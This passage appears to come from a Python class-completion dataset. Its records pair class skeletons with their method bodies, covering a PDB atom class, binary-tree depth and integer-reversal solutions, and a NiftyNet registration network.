false\n\n<|skeleton|>\nclass DefinitionAtom:\n \"\"\"Class DefinitionAtom The DefinitionAtom class inherits off the Atom class. It provides a trimmed down version of the initializating function from the Atom class for the definition files.\"\"\"\n\n def __init__(self, serial, name, resName, x, y, z):\n \"\"\"Initialize using a few basic parameters - set all other fields to null, which is necessary for debugging output by using the string function in the parent class. Parameters serial: Atom serial number (int) name: Atom name. (string) resName: Residue name. (string) resSeq: Residue sequence number. (int) x: Orthogonal coordinates for X in Angstroms. (float) y: Orthogonal coordinates for Y in Angstroms. (float) z: Orthogonal coordinates for Z in Angstroms. (float)\"\"\"\n <|body_0|>\n\n def isBackbone(self):\n \"\"\"Return true if atom name is in backbone, otherwise false Returns state: 1 if true, 0 if false\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.type = 'ATOM'\n self.serial = serial\n self.name = name\n self.altLoc = ''\n self.resName = resName\n self.chainID = ''\n self.resSeq = 1\n self.iCode = ''\n self.x = x\n self.y = y\n self.z = z\n self.occupancy = 0.0\n self.tempFactor = 0.0\n self.segID = ''\n self.element = ''\n self.charge = ''\n self.ffcharge = 0.0\n self.radius = 0.0\n self.intrabonds = []\n self.residue = None\n self.refdistance = None\n<|end_body_0|>\n\n<|body_start_1|>\n state = 0\n if self.name in BACKBONE:\n state = 1\n return state\n<|end_body_1|>\n", "revision_id": "a50f0b2f7104007c730baa51b4ec65c891008c47", "skeleton": "<|skeleton|>\nclass DefinitionAtom:\n \"\"\"Class DefinitionAtom The DefinitionAtom class inherits off the Atom class. It provides a trimmed down version of the initializating function from the Atom class for the definition files.\"\"\"\n\n def __init__(self, serial, name, resName, x, y, z):\n \"\"\"Initialize using a few basic parameters - set all other fields to null, which is necessary for debugging output by using the string function in the parent class. Parameters serial: Atom serial number (int) name: Atom name. (string) resName: Residue name. (string) resSeq: Residue sequence number. (int) x: Orthogonal coordinates for X in Angstroms. (float) y: Orthogonal coordinates for Y in Angstroms. (float) z: Orthogonal coordinates for Z in Angstroms. (float)\"\"\"\n <|body_0|>\n\n def isBackbone(self):\n \"\"\"Return true if atom name is in backbone, otherwise false Returns state: 1 if true, 0 if false\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class DefinitionAtom:\n \"\"\"Class DefinitionAtom The DefinitionAtom class inherits off the Atom class. It provides a trimmed down version of the initializating function from the Atom class for the definition files.\"\"\"\n\n def __init__(self, serial, name, resName, x, y, z):\n \"\"\"Initialize using a few basic parameters - set all other fields to null, which is necessary for debugging output by using the string function in the parent class. Parameters serial: Atom serial number (int) name: Atom name. (string) resName: Residue name. (string) resSeq: Residue sequence number. (int) x: Orthogonal coordinates for X in Angstroms. (float) y: Orthogonal coordinates for Y in Angstroms. (float) z: Orthogonal coordinates for Z in Angstroms. (float)\"\"\"\n self.type = 'ATOM'\n self.serial = serial\n self.name = name\n self.altLoc = ''\n self.resName = resName\n self.chainID = ''\n self.resSeq = 1\n self.iCode = ''\n self.x = x\n self.y = y\n self.z = z\n self.occupancy = 0.0\n self.tempFactor = 0.0\n self.segID = ''\n self.element = ''\n self.charge = ''\n self.ffcharge = 0.0\n self.radius = 0.0\n self.intrabonds = []\n self.residue = None\n self.refdistance = None\n\n def isBackbone(self):\n \"\"\"Return true if atom name is in backbone, otherwise false Returns state: 1 if true, 0 if false\"\"\"\n state = 0\n if self.name in BACKBONE:\n state = 1\n return state\n", "source": "the_stack_v2_python_sparse", "source_path": "mscreen/autodocktools_prepare_py3k/MolKit/pdb2pqr/definitions.py", "source_repo": "e-mayo/mscreen", "split": "test", "star_events_count": 10} {"blob_id": "a494402d72c8c73c06be7ecaef7cd76acf3268c1", "bodies": ["if not root:\n return 0\nleft_subtree_depth = self.minDepth(root.left)\nright_subtree_depth = self.minDepth(root.right)\nreturn (min(left_subtree_depth, right_subtree_depth) or max(left_subtree_depth, right_subtree_depth)) + 1", "if not root:\n return 0\nqueue = [root]\nmin_depth = 0\nrow_node_num = 1\nwhile row_node_num > 0:\n min_depth += 1\n while row_node_num > 0:\n current_node = queue.pop(0)\n if not current_node.left and (not current_node.right):\n return min_depth\n if current_node.left:\n queue.append(current_node.left)\n if current_node.right:\n queue.append(current_node.right)\n row_node_num -= 1\n row_node_num = len(queue)"], "bodies_text": "<|body_start_0|>\n if not root:\n return 0\n left_subtree_depth = self.minDepth(root.left)\n right_subtree_depth = self.minDepth(root.right)\n return (min(left_subtree_depth, right_subtree_depth) or max(left_subtree_depth, right_subtree_depth)) + 1\n<|end_body_0|>\n\n<|body_start_1|>\n if not root:\n return 0\n queue = [root]\n min_depth = 0\n row_node_num = 1\n while row_node_num > 0:\n min_depth += 1\n while row_node_num > 0:\n current_node = queue.pop(0)\n if not current_node.left and (not current_node.right):\n return min_depth\n if current_node.left:\n queue.append(current_node.left)\n if current_node.right:\n queue.append(current_node.right)\n row_node_num -= 1\n row_node_num = len(queue)\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def minDepth(self, root):\n \"\"\":type root: TreeNode :rtype: int\"\"\"\n <|body_0|>\n\n def minDepthIterate(self, root):\n \"\"\"迭代方式,层序遍历,遇到的第一个叶子节点就是最小深度的节点\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not root:\n return 0\n left_subtree_depth = self.minDepth(root.left)\n right_subtree_depth = self.minDepth(root.right)\n return (min(left_subtree_depth, right_subtree_depth) or max(left_subtree_depth, right_subtree_depth)) + 1\n<|end_body_0|>\n\n<|body_start_1|>\n if not root:\n return 0\n queue = [root]\n min_depth = 0\n row_node_num = 1\n while row_node_num > 0:\n min_depth += 1\n while row_node_num > 0:\n current_node = queue.pop(0)\n if not current_node.left and (not current_node.right):\n return min_depth\n if current_node.left:\n queue.append(current_node.left)\n if current_node.right:\n queue.append(current_node.right)\n row_node_num -= 1\n row_node_num = len(queue)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000349", "length_bytes": 1745, "license_type": "no_license", "methods": [{"docstring": ":type root: TreeNode :rtype: int", "name": "minDepth", "signature": "def minDepth(self, root)"}, {"docstring": "迭代方式,层序遍历,遇到的第一个叶子节点就是最小深度的节点", "name": "minDepthIterate", "signature": "def minDepthIterate(self, root)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002658", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def minDepth(self, root): :type root: TreeNode :rtype: int\n- def minDepthIterate(self, root): 迭代方式,层序遍历,遇到的第一个叶子节点就是最小深度的节点", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def minDepth(self, root): :type root: TreeNode :rtype: int\n- def minDepthIterate(self, root): 迭代方式,层序遍历,遇到的第一个叶子节点就是最小深度的节点\n\n<|skeleton|>\nclass Solution:\n\n def minDepth(self, root):\n \"\"\":type root: TreeNode :rtype: int\"\"\"\n <|body_0|>\n\n def minDepthIterate(self, root):\n \"\"\"迭代方式,层序遍历,遇到的第一个叶子节点就是最小深度的节点\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not root:\n return 0\n left_subtree_depth = self.minDepth(root.left)\n right_subtree_depth = self.minDepth(root.right)\n return (min(left_subtree_depth, right_subtree_depth) or max(left_subtree_depth, right_subtree_depth)) + 1\n<|end_body_0|>\n\n<|body_start_1|>\n if not root:\n return 0\n queue = [root]\n min_depth = 0\n row_node_num = 1\n while row_node_num > 0:\n min_depth += 1\n while row_node_num > 0:\n current_node = queue.pop(0)\n if not current_node.left and (not current_node.right):\n return min_depth\n if current_node.left:\n queue.append(current_node.left)\n if current_node.right:\n queue.append(current_node.right)\n row_node_num -= 1\n row_node_num = len(queue)\n<|end_body_1|>\n", "revision_id": "8853f85214ac88db024d26e228f1848dd5acd933", "skeleton": "<|skeleton|>\nclass Solution:\n\n def minDepth(self, root):\n \"\"\":type root: TreeNode :rtype: int\"\"\"\n <|body_0|>\n\n def minDepthIterate(self, root):\n \"\"\"迭代方式,层序遍历,遇到的第一个叶子节点就是最小深度的节点\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def minDepth(self, root):\n \"\"\":type root: TreeNode :rtype: int\"\"\"\n if not root:\n return 0\n left_subtree_depth = self.minDepth(root.left)\n right_subtree_depth = self.minDepth(root.right)\n return (min(left_subtree_depth, right_subtree_depth) or max(left_subtree_depth, right_subtree_depth)) + 1\n\n def minDepthIterate(self, root):\n \"\"\"迭代方式,层序遍历,遇到的第一个叶子节点就是最小深度的节点\"\"\"\n if not root:\n return 0\n queue = [root]\n min_depth = 0\n row_node_num = 1\n while row_node_num > 0:\n min_depth += 1\n while row_node_num > 0:\n current_node = queue.pop(0)\n if not current_node.left and (not current_node.right):\n return min_depth\n if current_node.left:\n queue.append(current_node.left)\n if current_node.right:\n queue.append(current_node.right)\n row_node_num -= 1\n row_node_num = len(queue)\n", "source": "the_stack_v2_python_sparse", "source_path": "111-MinimumDepthofBinaryTree/MinimumDepthofBinaryTree.py", "source_repo": "cqxmzhc/my_leetcode_solutions", "split": "test", "star_events_count": 2} {"blob_id": "976ef4a4e02f900221e023f10dda42e190459cf7", "bodies": ["BaseNet.__init__(self, name=name)\nself.global_net = INetAffine(decay=decay, affine_w_initializer=affine_w_initializer, affine_b_initializer=affine_b_initializer, acti_func=acti_func, name='inet-global')\nself.local_net = INetDense(decay=decay, disp_w_initializer=disp_w_initializer, disp_b_initializer=disp_b_initializer, acti_func=acti_func, name='inet-local')\nself.interp = interp\nself.boundary = boundary", "affine_field = self.global_net(fixed_image, moving_image, is_training)\ndense_field = self.local_net(fixed_image, moving_image, is_training)\nreturn (dense_field + affine_field, dense_field, affine_field)"], "bodies_text": "<|body_start_0|>\n BaseNet.__init__(self, name=name)\n self.global_net = INetAffine(decay=decay, affine_w_initializer=affine_w_initializer, affine_b_initializer=affine_b_initializer, acti_func=acti_func, name='inet-global')\n self.local_net = INetDense(decay=decay, disp_w_initializer=disp_w_initializer, disp_b_initializer=disp_b_initializer, acti_func=acti_func, name='inet-local')\n self.interp = interp\n self.boundary = boundary\n<|end_body_0|>\n\n<|body_start_1|>\n affine_field = self.global_net(fixed_image, moving_image, is_training)\n dense_field = self.local_net(fixed_image, moving_image, is_training)\n return (dense_field + affine_field, dense_field, affine_field)\n<|end_body_1|>\n", "class_docstring": "### Description Re-implementation of the registration network proposed in: Hu et al., Label-driven weakly-supervised learning for multimodal deformable image registration, arXiv:1711.01666 https://arxiv.org/abs/1711.01666 Hu et al., Weakly-Supervised Convolutional Neural Networks for Multimodal Image Registration, Medical Image Analysis (2018) https://doi.org/10.1016/j.media.2018.07.002 see also: https://github.com/YipengHu/label-reg ### Building blocks [GLOBAL] - INetAffine from interventional_affine_net.py [DENSE] - INetDense from intervetional_dense_net.py ### Diagram INPUT PAIR --> [GLOBAL] --> AFFINE FIELD --- DENSE + AFFINE FIELD | | -------> [DENSE] --> DENSE FIELD ------ ### Constrai", "class_name": "INetHybridTwoStream", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass INetHybridTwoStream:\n \"\"\"### Description Re-implementation of the registration network proposed in: Hu et al., Label-driven weakly-supervised learning for multimodal deformable image registration, arXiv:1711.01666 https://arxiv.org/abs/1711.01666 Hu et al., Weakly-Supervised Convolutional Neural Networks for Multimodal Image Registration, Medical Image Analysis (2018) https://doi.org/10.1016/j.media.2018.07.002 see also: https://github.com/YipengHu/label-reg ### Building blocks [GLOBAL] - INetAffine from interventional_affine_net.py [DENSE] - INetDense from intervetional_dense_net.py ### Diagram INPUT PAIR --> [GLOBAL] --> AFFINE FIELD --- DENSE + AFFINE FIELD | | -------> [DENSE] --> DENSE FIELD ------ ### Constrai\"\"\"\n\n def __init__(self, decay, affine_w_initializer=None, affine_b_initializer=None, disp_w_initializer=None, disp_b_initializer=None, acti_func='relu', interp='linear', boundary='replicate', name='inet-hybrid-two-stream'):\n \"\"\":param decay: float, regularisation decay :param affine_w_initializer: weight initialisation for affine registration network :param affine_b_initializer: bias initialisation for affine registration network :param disp_w_initializer: weight initialisation for dense registration network :param disp_b_initializer: bias initialisation for dense registration network :param acti_func: activation function to use :param interp: string, type of interpolation for the resampling [default:linear] - not in use :param boundary: string, padding mode to deal with image boundary [default: replicate] - not is use :param name: layer name\"\"\"\n <|body_0|>\n\n def layer_op(self, fixed_image, moving_image, is_training=True, **unused_kwargs):\n \"\"\":param fixed_image: tensor, fixed image for registration (defines reference space) :param moving_image: tensor, moving image to be registered to fixed :param is_training: boolean, True if network is in training mode :param unused_kwargs: not in use :return: estimated total, dense and affine displacement fields\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n BaseNet.__init__(self, name=name)\n self.global_net = INetAffine(decay=decay, affine_w_initializer=affine_w_initializer, affine_b_initializer=affine_b_initializer, acti_func=acti_func, name='inet-global')\n self.local_net = INetDense(decay=decay, disp_w_initializer=disp_w_initializer, disp_b_initializer=disp_b_initializer, acti_func=acti_func, name='inet-local')\n self.interp = interp\n self.boundary = boundary\n<|end_body_0|>\n\n<|body_start_1|>\n affine_field = self.global_net(fixed_image, moving_image, is_training)\n dense_field = self.local_net(fixed_image, moving_image, is_training)\n return (dense_field + affine_field, dense_field, affine_field)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000350", "length_bytes": 7784, "license_type": "permissive", "methods": [{"docstring": ":param decay: float, regularisation decay :param affine_w_initializer: weight initialisation for affine registration network :param affine_b_initializer: bias initialisation for affine registration network :param disp_w_initializer: weight initialisation for dense registration network :param disp_b_initializer: bias initialisation for dense registration network :param acti_func: activation function to use :param interp: string, type of interpolation for the resampling [default:linear] - not in use :param boundary: string, padding mode to deal with image boundary [default: replicate] - not is use :param name: layer name", "name": "__init__", "signature": "def __init__(self, decay, affine_w_initializer=None, affine_b_initializer=None, disp_w_initializer=None, disp_b_initializer=None, acti_func='relu', interp='linear', boundary='replicate', name='inet-hybrid-two-stream')"}, {"docstring": ":param fixed_image: tensor, fixed image for registration (defines reference space) :param moving_image: tensor, moving image to be registered to fixed :param is_training: boolean, True if network is in training mode :param unused_kwargs: not in use :return: estimated total, dense and affine displacement fields", "name": "layer_op", "signature": "def layer_op(self, fixed_image, moving_image, is_training=True, **unused_kwargs)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002527", "prompt": "Implement the Python class `INetHybridTwoStream` described below.\n\nClass description:\n### Description Re-implementation of the registration network proposed in: Hu et al., Label-driven weakly-supervised learning for multimodal deformable image registration, arXiv:1711.01666 https://arxiv.org/abs/1711.01666 Hu et al., Weakly-Supervised Convolutional Neural Networks for Multimodal Image Registration, Medical Image Analysis (2018) https://doi.org/10.1016/j.media.2018.07.002 see also: https://github.com/YipengHu/label-reg ### Building blocks [GLOBAL] - INetAffine from interventional_affine_net.py [DENSE] - INetDense from intervetional_dense_net.py ### Diagram INPUT PAIR --> [GLOBAL] --> AFFINE FIELD --- DENSE + AFFINE FIELD | | -------> [DENSE] --> DENSE FIELD ------ ### Constrai\n\nMethod signatures and docstrings:\n- def __init__(self, decay, affine_w_initializer=None, affine_b_initializer=None, disp_w_initializer=None, disp_b_initializer=None, acti_func='relu', interp='linear', boundary='replicate', name='inet-hybrid-two-stream'): :param decay: float, regularisation decay :param affine_w_initializer: weight initialisation for affine registration network :param affine_b_initializer: bias initialisation for affine registration network :param disp_w_initializer: weight initialisation for dense registration network :param disp_b_initializer: bias initialisation for dense registration network :param acti_func: activation function to use :param interp: string, type of interpolation for the resampling [default:linear] - not in use :param boundary: string, padding mode to deal with image boundary [default: replicate] - not is use :param name: layer name\n- def layer_op(self, fixed_image, moving_image, is_training=True, **unused_kwargs): :param fixed_image: tensor, fixed image for registration (defines reference space) :param moving_image: tensor, moving image to be registered to fixed :param is_training: boolean, True if network is in training mode :param unused_kwargs: not in use :return: estimated total, dense and affine displacement fields", "prompted_full_text": "Implement the Python class `INetHybridTwoStream` described below.\n\nClass description:\n### Description Re-implementation of the registration network proposed in: Hu et al., Label-driven weakly-supervised learning for multimodal deformable image registration, arXiv:1711.01666 https://arxiv.org/abs/1711.01666 Hu et al., Weakly-Supervised Convolutional Neural Networks for Multimodal Image Registration, Medical Image Analysis (2018) https://doi.org/10.1016/j.media.2018.07.002 see also: https://github.com/YipengHu/label-reg ### Building blocks [GLOBAL] - INetAffine from interventional_affine_net.py [DENSE] - INetDense from intervetional_dense_net.py ### Diagram INPUT PAIR --> [GLOBAL] --> AFFINE FIELD --- DENSE + AFFINE FIELD | | -------> [DENSE] --> DENSE FIELD ------ ### Constrai\n\nMethod signatures and docstrings:\n- def __init__(self, decay, affine_w_initializer=None, affine_b_initializer=None, disp_w_initializer=None, disp_b_initializer=None, acti_func='relu', interp='linear', boundary='replicate', name='inet-hybrid-two-stream'): :param decay: float, regularisation decay :param affine_w_initializer: weight initialisation for affine registration network :param affine_b_initializer: bias initialisation for affine registration network :param disp_w_initializer: weight initialisation for dense registration network :param disp_b_initializer: bias initialisation for dense registration network :param acti_func: activation function to use :param interp: string, type of interpolation for the resampling [default:linear] - not in use :param boundary: string, padding mode to deal with image boundary [default: replicate] - not is use :param name: layer name\n- def layer_op(self, fixed_image, moving_image, is_training=True, **unused_kwargs): :param fixed_image: tensor, fixed image for registration (defines reference space) :param moving_image: tensor, moving image to be registered to fixed :param is_training: boolean, True if network is in training mode :param unused_kwargs: not in use :return: estimated total, dense and affine displacement fields\n\n<|skeleton|>\nclass INetHybridTwoStream:\n \"\"\"### Description Re-implementation of the registration network proposed in: Hu et al., Label-driven weakly-supervised learning for multimodal deformable image registration, arXiv:1711.01666 https://arxiv.org/abs/1711.01666 Hu et al., Weakly-Supervised Convolutional Neural Networks for Multimodal Image Registration, Medical Image Analysis (2018) https://doi.org/10.1016/j.media.2018.07.002 see also: https://github.com/YipengHu/label-reg ### Building blocks [GLOBAL] - INetAffine from interventional_affine_net.py [DENSE] - INetDense from intervetional_dense_net.py ### Diagram INPUT PAIR --> [GLOBAL] --> AFFINE FIELD --- DENSE + AFFINE FIELD | | -------> [DENSE] --> DENSE FIELD ------ ### Constrai\"\"\"\n\n def __init__(self, decay, affine_w_initializer=None, affine_b_initializer=None, disp_w_initializer=None, disp_b_initializer=None, acti_func='relu', interp='linear', boundary='replicate', name='inet-hybrid-two-stream'):\n \"\"\":param decay: float, regularisation decay :param affine_w_initializer: weight initialisation for affine registration network :param affine_b_initializer: bias initialisation for affine registration network :param disp_w_initializer: weight initialisation for dense registration network :param disp_b_initializer: bias initialisation for dense registration network :param acti_func: activation function to use :param interp: string, type of interpolation for the resampling [default:linear] - not in use :param boundary: string, padding mode to deal with image boundary [default: replicate] - not is use :param name: layer name\"\"\"\n <|body_0|>\n\n def layer_op(self, fixed_image, moving_image, is_training=True, **unused_kwargs):\n \"\"\":param fixed_image: tensor, fixed image for registration (defines reference space) :param moving_image: tensor, moving image to be registered to fixed :param is_training: boolean, True if network is in training mode :param unused_kwargs: not in use :return: estimated total, dense and affine displacement fields\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n BaseNet.__init__(self, name=name)\n self.global_net = INetAffine(decay=decay, affine_w_initializer=affine_w_initializer, affine_b_initializer=affine_b_initializer, acti_func=acti_func, name='inet-global')\n self.local_net = INetDense(decay=decay, disp_w_initializer=disp_w_initializer, disp_b_initializer=disp_b_initializer, acti_func=acti_func, name='inet-local')\n self.interp = interp\n self.boundary = boundary\n<|end_body_0|>\n\n<|body_start_1|>\n affine_field = self.global_net(fixed_image, moving_image, is_training)\n dense_field = self.local_net(fixed_image, moving_image, is_training)\n return (dense_field + affine_field, dense_field, affine_field)\n<|end_body_1|>\n", "revision_id": "67db048685705e36622bc2851b4c7794e56065ad", "skeleton": "<|skeleton|>\nclass INetHybridTwoStream:\n \"\"\"### Description Re-implementation of the registration network proposed in: Hu et al., Label-driven weakly-supervised learning for multimodal deformable image registration, arXiv:1711.01666 https://arxiv.org/abs/1711.01666 Hu et al., Weakly-Supervised Convolutional Neural Networks for Multimodal Image Registration, Medical Image Analysis (2018) https://doi.org/10.1016/j.media.2018.07.002 see also: https://github.com/YipengHu/label-reg ### Building blocks [GLOBAL] - INetAffine from interventional_affine_net.py [DENSE] - INetDense from intervetional_dense_net.py ### Diagram INPUT PAIR --> [GLOBAL] --> AFFINE FIELD --- DENSE + AFFINE FIELD | | -------> [DENSE] --> DENSE FIELD ------ ### Constrai\"\"\"\n\n def __init__(self, decay, affine_w_initializer=None, affine_b_initializer=None, disp_w_initializer=None, disp_b_initializer=None, acti_func='relu', interp='linear', boundary='replicate', name='inet-hybrid-two-stream'):\n \"\"\":param decay: float, regularisation decay :param affine_w_initializer: weight initialisation for affine registration network :param affine_b_initializer: bias initialisation for affine registration network :param disp_w_initializer: weight initialisation for dense registration network :param disp_b_initializer: bias initialisation for dense registration network :param acti_func: activation function to use :param interp: string, type of interpolation for the resampling [default:linear] - not in use :param boundary: string, padding mode to deal with image boundary [default: replicate] - not is use :param name: layer name\"\"\"\n <|body_0|>\n\n def layer_op(self, fixed_image, moving_image, is_training=True, **unused_kwargs):\n \"\"\":param fixed_image: tensor, fixed image for registration (defines reference space) :param moving_image: tensor, moving image to be registered to fixed :param is_training: boolean, True if network is in training mode :param unused_kwargs: not in use :return: estimated total, dense and affine displacement fields\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class INetHybridTwoStream:\n \"\"\"### Description Re-implementation of the registration network proposed in: Hu et al., Label-driven weakly-supervised learning for multimodal deformable image registration, arXiv:1711.01666 https://arxiv.org/abs/1711.01666 Hu et al., Weakly-Supervised Convolutional Neural Networks for Multimodal Image Registration, Medical Image Analysis (2018) https://doi.org/10.1016/j.media.2018.07.002 see also: https://github.com/YipengHu/label-reg ### Building blocks [GLOBAL] - INetAffine from interventional_affine_net.py [DENSE] - INetDense from intervetional_dense_net.py ### Diagram INPUT PAIR --> [GLOBAL] --> AFFINE FIELD --- DENSE + AFFINE FIELD | | -------> [DENSE] --> DENSE FIELD ------ ### Constrai\"\"\"\n\n def __init__(self, decay, affine_w_initializer=None, affine_b_initializer=None, disp_w_initializer=None, disp_b_initializer=None, acti_func='relu', interp='linear', boundary='replicate', name='inet-hybrid-two-stream'):\n \"\"\":param decay: float, regularisation decay :param affine_w_initializer: weight initialisation for affine registration network :param affine_b_initializer: bias initialisation for affine registration network :param disp_w_initializer: weight initialisation for dense registration network :param disp_b_initializer: bias initialisation for dense registration network :param acti_func: activation function to use :param interp: string, type of interpolation for the resampling [default:linear] - not in use :param boundary: string, padding mode to deal with image boundary [default: replicate] - not is use :param name: layer name\"\"\"\n BaseNet.__init__(self, name=name)\n self.global_net = INetAffine(decay=decay, affine_w_initializer=affine_w_initializer, affine_b_initializer=affine_b_initializer, acti_func=acti_func, name='inet-global')\n self.local_net = INetDense(decay=decay, disp_w_initializer=disp_w_initializer, disp_b_initializer=disp_b_initializer, acti_func=acti_func, name='inet-local')\n self.interp = interp\n self.boundary = boundary\n\n def layer_op(self, fixed_image, moving_image, is_training=True, **unused_kwargs):\n \"\"\":param fixed_image: tensor, fixed image for registration (defines reference space) :param moving_image: tensor, moving image to be registered to fixed :param is_training: boolean, True if network is in training mode :param unused_kwargs: not in use :return: estimated total, dense and affine displacement fields\"\"\"\n affine_field = self.global_net(fixed_image, moving_image, is_training)\n dense_field = self.local_net(fixed_image, moving_image, is_training)\n return (dense_field + affine_field, dense_field, affine_field)\n", "source": "the_stack_v2_python_sparse", "source_path": "niftynet/network/interventional_hybrid_net.py", "source_repo": "BRAINSia/NiftyNet", "split": "test", "star_events_count": 0} {"blob_id": "1480a8b6ed72711a0ba32cf235a299a605d61d6d", "bodies": ["res = 0\nif x < 0:\n symbol = -1\n x = -x\nelse:\n symbol = 1\nwhile x:\n pop = x % 10\n x = x // 10\n res = res * 10 + pop\nreturn 0 if res > pow(2, 31) else res * symbol", "temp = str(x)\nif temp[0] != '-':\n temp = temp[::-1]\nelse:\n temp2 = temp[1:]\n temp2 = temp2[::-1]\n temp = temp[0] + temp2\nreturn int(temp) if -2 ** 31 - 1 < int(temp) < 2 ** 31 else 0"], "bodies_text": "<|body_start_0|>\n res = 0\n if x < 0:\n symbol = -1\n x = -x\n else:\n symbol = 1\n while x:\n pop = x % 10\n x = x // 10\n res = res * 10 + pop\n return 0 if res > pow(2, 31) else res * symbol\n<|end_body_0|>\n\n<|body_start_1|>\n temp = str(x)\n if temp[0] != '-':\n temp = temp[::-1]\n else:\n temp2 = temp[1:]\n temp2 = temp2[::-1]\n temp = temp[0] + temp2\n return int(temp) if -2 ** 31 - 1 < int(temp) < 2 ** 31 else 0\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def reverse(self, x):\n \"\"\":type x: int :rtype: int\"\"\"\n <|body_0|>\n\n def reverse2(self, x):\n \"\"\":type x: int :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n res = 0\n if x < 0:\n symbol = -1\n x = -x\n else:\n symbol = 1\n while x:\n pop = x % 10\n x = x // 10\n res = res * 10 + pop\n return 0 if res > pow(2, 31) else res * symbol\n<|end_body_0|>\n\n<|body_start_1|>\n temp = str(x)\n if temp[0] != '-':\n temp = temp[::-1]\n else:\n temp2 = temp[1:]\n temp2 = temp2[::-1]\n temp = temp[0] + temp2\n return int(temp) if -2 ** 31 - 1 < int(temp) < 2 ** 31 else 0\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000351", "length_bytes": 856, "license_type": "no_license", "methods": [{"docstring": ":type x: int :rtype: int", "name": "reverse", "signature": "def reverse(self, x)"}, {"docstring": ":type x: int :rtype: int", "name": "reverse2", "signature": "def reverse2(self, x)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_006172", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def reverse(self, x): :type x: int :rtype: int\n- def reverse2(self, x): :type x: int :rtype: int", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def reverse(self, x): :type x: int :rtype: int\n- def reverse2(self, x): :type x: int :rtype: int\n\n<|skeleton|>\nclass Solution:\n\n def reverse(self, x):\n \"\"\":type x: int :rtype: int\"\"\"\n <|body_0|>\n\n def reverse2(self, x):\n \"\"\":type x: int :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n res = 0\n if x < 0:\n symbol = -1\n x = -x\n else:\n symbol = 1\n while x:\n pop = x % 10\n x = x // 10\n res = res * 10 + pop\n return 0 if res > pow(2, 31) else res * symbol\n<|end_body_0|>\n\n<|body_start_1|>\n temp = str(x)\n if temp[0] != '-':\n temp = temp[::-1]\n else:\n temp2 = temp[1:]\n temp2 = temp2[::-1]\n temp = temp[0] + temp2\n return int(temp) if -2 ** 31 - 1 < int(temp) < 2 ** 31 else 0\n<|end_body_1|>\n", "revision_id": "1a3c1f4d6e9d3444039f087763b93241f4ba7892", "skeleton": "<|skeleton|>\nclass Solution:\n\n def reverse(self, x):\n \"\"\":type x: int :rtype: int\"\"\"\n <|body_0|>\n\n def reverse2(self, x):\n \"\"\":type x: int :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def reverse(self, x):\n \"\"\":type x: int :rtype: int\"\"\"\n res = 0\n if x < 0:\n symbol = -1\n x = -x\n else:\n symbol = 1\n while x:\n pop = x % 10\n x = x // 10\n res = res * 10 + pop\n return 0 if res > pow(2, 31) else res * symbol\n\n def reverse2(self, x):\n \"\"\":type x: int :rtype: int\"\"\"\n temp = str(x)\n if temp[0] != '-':\n temp = temp[::-1]\n else:\n temp2 = temp[1:]\n temp2 = temp2[::-1]\n temp = temp[0] + temp2\n return int(temp) if -2 ** 31 - 1 < int(temp) < 2 ** 31 else 0\n", "source": "the_stack_v2_python_sparse", "source_path": "Algorithm/007_Reverse_Integer.py", "source_repo": "Gi1ia/TechNoteBook", "split": "test", "star_events_count": 7} {"blob_id": "e312b1d5d6279ab5fa4cae313f044f9ed3b4a023", "bodies": ["actual = clean_text('check out this link: https://cyphon.io')\nexpected = 'check out this link'\nself.assertEqual(actual, expected)", "actual = clean_text('@foobar hey there')\nexpected = 'hey there'\nself.assertEqual(actual, expected)", "actual = clean_text('#foobar hey there')\nexpected = 'foobar hey there'\nself.assertEqual(actual, expected)"], "bodies_text": "<|body_start_0|>\n actual = clean_text('check out this link: https://cyphon.io')\n expected = 'check out this link'\n self.assertEqual(actual, expected)\n<|end_body_0|>\n\n<|body_start_1|>\n actual = clean_text('@foobar hey there')\n expected = 'hey there'\n self.assertEqual(actual, expected)\n<|end_body_1|>\n\n<|body_start_2|>\n actual = clean_text('#foobar hey there')\n expected = 'foobar hey there'\n self.assertEqual(actual, 